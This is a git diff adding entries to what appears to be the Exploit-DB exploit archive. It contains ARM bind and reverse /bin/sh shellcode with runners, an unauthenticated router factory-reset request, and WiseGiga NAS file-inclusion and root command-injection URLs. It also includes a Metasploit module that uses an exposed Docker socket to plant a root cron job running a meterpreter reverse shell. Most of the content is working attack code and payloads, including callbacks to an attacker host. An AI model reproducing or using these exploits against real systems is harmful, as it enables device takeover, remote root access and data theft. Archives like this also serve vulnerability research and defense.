diff --git a/files.csv b/files.csv index 38719c41b..062320666 100644 --- a/files.csv +++ b/files.csv @@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port 42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0 42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0 42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80 +42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port 42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0 42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0 +42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0 +42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port 42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0 42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0 42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0 +42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0 +42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0 +42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0 diff --git a/platforms/arm/shellcode/42646.c b/platforms/arm/shellcode/42646.c new file mode 100755 index 000000000..58d690e24 --- /dev/null +++ b/platforms/arm/shellcode/42646.c @@ -0,0 +1,89 @@ +/* + +################################## +# Andrea Sindoni - @invictus1306 # +################################## + +This schellcode is part of my episodes: +- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ + +Enviroment: Raspberry pi 3 + +Default settings for port:4444 + +@.syntax unified +.global _start +_start: + + mov r1, #0x5C @ r1=0x5c + mov r5, #0x11 @ r5=0x11 + mov r1, r1, lsl #24 @ r1=0x5c000000 + add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me + add r1, #2 @ r1=0x5c110002 - sin_family+sin_port + sub r2, r2, r2 @ sin_addr + push {r1, r2} @ push into the stack r1 and r2 + mov r1, sp @ save pointer to sockaddr_in struct + mov r2, #0x10 @ addrlen + mov r0, r6 @ mov sockfd into r0 + ldr r7, =#282 @ bind syscall + swi 0 + + @ listen for incoming connections via SYS_LISTEN + @ int listen(int sockfd, int backlog); + + mov r0, r6 @ mov sockfd into r0 + mov r1, #1 @ backlog=1 + ldr r7, =#284 @ listen syscall + swi 0 + + @ Accept connections + @ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) + + mov r0, r6 @ mov sockfd into r0 + sub r1, r1, r1 @ addr=0 + sub r2, r2, r2 @ addrlen=0 + ldr r7, =#285 @ accept syscall + swi 0 + + @ Redirect stdin, stdout and stderr via dup2 + + mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2) + loop: + mov r7, #63 @ dup2 syscall + swi 0 + sub r1, r1, #1 @ decrement counter + cmp r1, #-1 @ compare r1 with -1 + bne loop @ if the result is not equal jmp to loop + + @ int execve(const char *filename, char *const argv[],char *const envp[]); + mov r0, pc + add r0, #32 + sub r2, r2, r2 + push {r0, r2} + mov r1, sp + mov r7, #11 + swi 0 + +_exit: + mov r0, #0 + mov r7, #1 + swi 0 @ exit(0) + +.asciz "/bin/sh" + +Assemble and link it: +as -o bind.o bind.s +ld -o bind bind.o +*/ + +#include + +char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00"; + +int main(void) { + + (*(void(*)()) code)(); + + return 0; + +} diff --git a/platforms/arm/shellcode/42647.c b/platforms/arm/shellcode/42647.c new file mode 100755 index 000000000..06bb38aeb --- /dev/null +++ b/platforms/arm/shellcode/42647.c @@ -0,0 +1,71 @@ +/* + +################################## +# Andrea Sindoni - @invictus1306 # +################################## + +This schellcode is part of my episodes: +- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ + +Enviroment: Raspberry pi 3 + +Default settings for port:4444 ip:192.168.0.12 + +.global _start +_start: + + mov r1, #0x5C @ r1=0x5c + mov r5, #0x11 @ r5=0x11 + mov r1, r1, lsl #24 @ r1=0x5c000000 + add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me + add r1, #2 @ r1=0x5c110002 - sin_family+sin_port + ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me + push {r1, r2} @ push into the stack r1 and r2 + mov r1, sp @ save pointer to sockaddr_in struct + + mov r2, #0x10 @ addrlen + mov r0, r6 @ mov sockfd into r0 + ldr r7, =#283 @ connect syscall + swi 0 + + @ Redirect stdin, stdout and stderr via dup2 + mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2) + loop: + mov r0, r6 @ mov sockfd into r0 + mov r7, #63 @ dup2 syscall + swi 0 + sub r1, r1, #1 @ decrement counter + cmp r1, #-1 @ compare r1 with -1 + bne loop @ if the result is not equal jmp to loop + + @ int execve(const char *filename, char *const argv[],char *const envp[]); + + mov r0, pc + add r0, #32 + sub r2, r2, r2 + push {r0, r2} + mov r1, sp + mov r7, #11 + swi 0 + +_exit: + mov r0, #0 + mov r7, #1 + swi 0 @ exit(0) + +shell: .asciz "/bin/sh" + + +Assemble and link it: +as -o reverse_shell.o reverse_shell.s +ld -o reverse_shell reverse_shell.o +*/ + +#include + +char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00"; + +int main(void) { + (*(void(*)()) code)(); + return 0; +} diff --git a/platforms/hardware/webapps/42649.txt b/platforms/hardware/webapps/42649.txt new file mode 100755 index 000000000..dbf8f916b --- /dev/null +++ b/platforms/hardware/webapps/42649.txt @@ -0,0 +1,135 @@ +Title: +==== + +FiberHome Unauthenticated ADSL Router Factory Reset. + +Credit: +====== + +Name: Ibad Shah +Twitter: @BeeFaauBee09 +Website: beefaaubee09.github.io + + +CVE: +===== + +CVE-2017-14147 + +Date: +==== + +05-09-2017 (dd/mm/yyyy) + +About FiberHome: +====== + +FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world. + +Products & Services: +Wireless 3G/4G broadband devices +Custom engineered technologies +Broadband devices + +URL : http://www.fiberhomegroup.com/ + + +Description: +======= + +This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. + + + +Affected Device Model: +============= + +FiberHome ADSL AN1020-25 + + +Exploitation-Technique: +=================== + +Remote + + +Details: +======= + +Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials. + +1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147 + +Vulnerable restoreinfo.cgi + + + +Proof Of Concept: +================ + +PoC : + +GET /restoreinfo.cgi HTTP/1.1 +Host: 192.168.1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Connection: close + + +HTTP/1.1 200 Ok +Server: micro_httpd +Cache-Control: no-cache +Date: Sat, 01 Jan 2000 00:12:39 GMT +Content-Type: text/html +Connection: close + + + + + + + + + + +
+DSL Router Restore

+The DSL Router configuration has been restored to default settings and the +router is rebooting.

+Close the DSL Router Configuration window and wait for 2 minutes before +reopening your web browser. If necessary, reconfigure your PC's IP address to +match your new configuration. +
+ + + + + +Credits: +======= + +Ibad Shah, Taimooor Zafar, Owais Mehtab diff --git a/platforms/hardware/webapps/42651.txt b/platforms/hardware/webapps/42651.txt new file mode 100755 index 000000000..e7af53736 --- /dev/null +++ b/platforms/hardware/webapps/42651.txt @@ -0,0 +1,171 @@ +Source: https://blogs.securiteam.com/index.php/archives/3402 + +Vulnerabilities summary +The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices. + +WiseGiga is a Korean company selling NAS products. + +The vulnerabilities found in WiseGiga NAS are: + +Pre-Authentication Local File Inclusion (4 different vulnerabilities) +Post-Authentication Local File Inclusion +Remote Command Execution as root +Remote Command Execution as root with CSRF +Info Leak +Default accounts + + +Credit +An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program + + +Vendor response +We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. + + +Vulnerabilities details + +Pre-Authentication Local File Inclusion +User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords). + +By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities: + +/webfolder/download_file1.php +down_data.php +download_file.php +mobile/download_file1.php + + +Proof of Concept +http://IP/webfolder/download_file1.php?filename=/etc/passwd +http://IP/down_data.php?filename=/etc/passwd +http://IP/download_file.php?filename=base64(/etc/passwd) +http://IP/mobile/download_file1.php?filename=base64(/etc/passwd) + +Post-Authentication Local File Inclusion +User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords). + +By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability. + + +Proof of Concept +http://IP//mobile/download_file2.php?filename=base64(/etc/passwd) + + +Remote Command Execution as root +The WiseGiga NAS firmware contain pre.php files in the different directories. + +For example: +/app_data/apache/htdocs/auto/pre.php +/app_data/apache/htdocs/admin/iframe/pre.php +/app_data/apache/htdocs/admin/pre.php +/app_data/apache/htdocs/mobile/pre.php +/app_data/apache/htdocs/wiseapp/config/pre.php +/app_data/apache/htdocs/pre.php +/home/htdocs/webfolder/pre.php +/ub/update/init/pre.php +/tmp/home/root/htdocs/auto/pre.php +/tmp/home/root/htdocs/pre.php + + +A “standard” pre.php contains: + + 181 [...] + 182 function auth() + 183 { + 184 global $memberid; + 185 session_start(); + 186 //echo $memberid; + 187 if($memberid=="root") + 188 { + 189 // print<<<__DATA_OF_HTML__ + 190 // + 193 //__DATA_OF_HTML__; + 194 } + 195 else + 196 { + 197 print<<<__DATA_OF_HTML__ + 198 + 204 __DATA_OF_HTML__; + 205 } + 206 + 207 } + + +Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request: + +GET /webpage[...]?memberid=root&[...] HTTP/1.0 + + +The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen(): + +23 function root_exec_cmd($cmd) +24 { +25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w"); +26 fwrite($tmpfile,$cmd); +27 fclose($tmpfile); +28 popen("/tmp/ramdisk/ramush","r"); +29 } + +By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands + +The WiseGiga NAS run’s the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root. + + +Proof of Concept +By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function: + +178 if($cmd == "add") +179 { +180 add_system(); +181 } + +The add_system() function uses global for $group_name and $user_data. + +Then it will pass the user controlled input and will run it as root: + +145 function add_system() +146 { +147 global $group_name,$user_data; +148 +149 if(add_conf()==1) +150 { +151 //==================================================================================== +152 root_exec_cmd("addgroup $group_name"); + + +An attacker can get unauthenticated RCE as root by sending the following request: + +http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a + +The file /tmp/a will contain: + +uid=0(root) gid=48(apache) groups=48(apache) + + +Remote Command Execution as root with CSRF +There is no CSRF protection in WiseGiga NAS. + +An attacker can force the execution of a command as root when the victim visits the malicious website. + + +Proof of Concept +Once the victim visit the attacker’s website with the following code, the attacker can execute arbitrary commands. + + + + +InfoLeak +accessing http://IP/webfolder/config/config.php will disclose the PHP configuration. + + +Default accounts +Username: guest +Password: guest09#$ \ No newline at end of file diff --git a/platforms/php/webapps/42648.html b/platforms/php/webapps/42648.html new file mode 100755 index 000000000..7471fbb5c --- /dev/null +++ b/platforms/php/webapps/42648.html @@ -0,0 +1,35 @@ + + + + +
+ + + + + + + + +
+ + \ No newline at end of file diff --git a/platforms/python/remote/42650.rb b/platforms/python/remote/42650.rb new file mode 100755 index 000000000..7519fa8c8 --- /dev/null +++ b/platforms/python/remote/42650.rb @@ -0,0 +1,207 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit', + 'Description' => %q{ + Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp + with tls but without tls-auth), an attacker can create a Docker + container with the '/' path mounted with read/write permissions on the + host server that is running the Docker container. As the Docker + container executes command as uid 0 it is honored by the host operating + system allowing the attacker to edit/create files owned by root. This + exploit abuses this to creates a cron job in the '/etc/cron.d/' path of + the host server. + + The Docker image should exist on the target system or be a valid image + from hub.docker.com. + }, + 'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'], + ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] + ], + 'DisclosureDate' => 'Jul 25, 2017', + 'Targets' => [ + [ 'Python', { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => { + 'Compat' => { + 'ConnectionType' => 'reverse noconn none tunnel' + } + } + }] + ], + 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(2375), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('CONTAINER_ID', [ false, 'container id you would like']) + ] + ) + end + + def check_image(image_id) + vprint_status("Check if images exist on the target host") + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('images', 'json') + ) + return unless res and res.code == 200 and res.body.include? image_id + + res + end + + def pull_image(image_id) + print_status("Trying to pulling image from docker registry, this may take a while") + res = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + ) + return unless res.code == 200 + + res + end + + def make_container_id + return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? + + rand_text_alpha_lower(8) + end + + def make_cmd(mnt_path, cron_path, payload_path) + vprint_status('Creating the docker container command') + echo_cron_path = mnt_path + cron_path + echo_payload_path = mnt_path + payload_path + + cron_command = "python #{payload_path}" + payload_data = payload.raw + + command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " + command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + + command + end + + def make_container(mnt_path, cron_path, payload_path) + vprint_status('Setting container json request variables') + { + 'Image' => datastore['DOCKERIMAGE'], + 'Cmd' => make_cmd(mnt_path, cron_path, payload_path), + 'Entrypoint' => %w[/bin/sh -c], + 'HostConfig' => { + 'Binds' => [ + '/:' + mnt_path + ] + } + } + end + + def del_container(container_id) + send_request_raw( + { + 'method' => 'DELETE', + 'uri' => normalize_uri('containers', container_id) + }, + 1 # timeout + ) + end + + def check + res = send_request_raw( + 'method' => 'GET', + 'uri' => normalize_uri('containers', 'json'), + 'headers' => { 'Accept' => 'application/json' } + ) + + if res.nil? + print_error('Failed to connect to the target') + return Exploit::CheckCode::Unknown + end + + if res and res.code == 200 and res.headers['Server'].include? 'Docker' + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + # check if target is vulnerable + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::Unknown, 'Failed to connect to the target') + end + + # check if image is not available, pull it or fail out + image_id = datastore['DOCKERIMAGE'] + if check_image(image_id).nil? + fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil? + end + + # create required information to create json container information. + cron_path = '/etc/cron.d/' + rand_text_alpha(8) + payload_path = '/tmp/' + rand_text_alpha(8) + mnt_path = '/mnt/' + rand_text_alpha(8) + container_id = make_container_id + + # create container + res_create = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', 'create?name=' + container_id), + 'headers' => { 'Content-Type' => 'application/json' }, + 'data' => make_container(mnt_path, cron_path, payload_path).to_json + ) + fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 + + print_status("The docker container is created, waiting for deploy") + register_files_for_cleanup(cron_path, payload_path) + + # start container + send_request_raw( + { + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'start') + }, + 1 # timeout + ) + + # wait until container stopped + vprint_status("Waiting until the docker container stopped") + res_wait = send_request_raw( + 'method' => 'POST', + 'uri' => normalize_uri('containers', container_id, 'wait'), + 'headers' => { 'Accept' => 'application/json' } + ) + + # delete container + deleted_container = false + if res_wait.code == 200 + vprint_status("The docker container has been stopped, now trying to remove it") + del_container(container_id) + deleted_container = true + end + + # if container does not deploy, remove it and fail out + unless deleted_container + del_container(container_id) + fail_with(Failure::Unknown, "The docker container failed to deploy") + end + print_status('Waiting for the cron job to run, can take up to 60 seconds') + end +end \ No newline at end of file